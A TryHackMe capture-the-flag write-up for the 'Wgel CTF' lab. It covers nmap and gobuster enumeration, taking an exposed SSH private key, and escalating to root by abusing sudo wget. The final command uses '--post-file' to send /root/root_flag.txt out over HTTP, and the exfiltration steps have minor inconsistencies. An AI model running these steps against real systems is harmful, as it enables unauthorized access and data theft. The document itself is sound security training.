📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Wgel CTF

PreviousBrooklyn Nine NineNextTomghost

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.139.244

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244

Enumeration

Lets visit Port 80; the Web Server.

Its a default apache2 page, I made sure to check the source code and found something interesting

We now have a possible username Jessie, there is nothing else of interest so lets run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/

We found a hidden directory, lets go check it out

It is a very well made website, lets run gobuster on it in the background while we explore this webpage.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap

Looking at the website, most of the buttons work and are functional, we got the gobuster results, lets check them.

There is a /.ssh directory, which is really interesting, lets go see it.

We have an id_rsa file, which means that if we get the password for it with john the ripper and then we can login through ssh.

Lets first open the file and then copy the contents of the file and then make our own id_rsa file and paste it in .

Now lets find the password for it using ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Oh, its looks like we do not need a password to login, so lets directly login.

chmod 600 id_rsa
ssh jessie@10.10.139.244 -i id_rsa

We are logged in. We can now read the user.txt file

Privilege Escalation

Lets run the command sudo -l to check what we can run as root.

sudo -l

It looks like we can run /usr/bin/wget as root, we can try to send the root flag file to our machine using wget as it is a command that can send files. So first we need to open a http server to receive files.

python3 -m http.server 8080

We also have to start a netcat listener

Now lets use this command to send the root flag to our machine, here we cannot be sure of the root flag file name but looking at the how the user flag was named, we can guess what it is named.

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244

After you hit enter, you get contents of a file.

This is the root flag.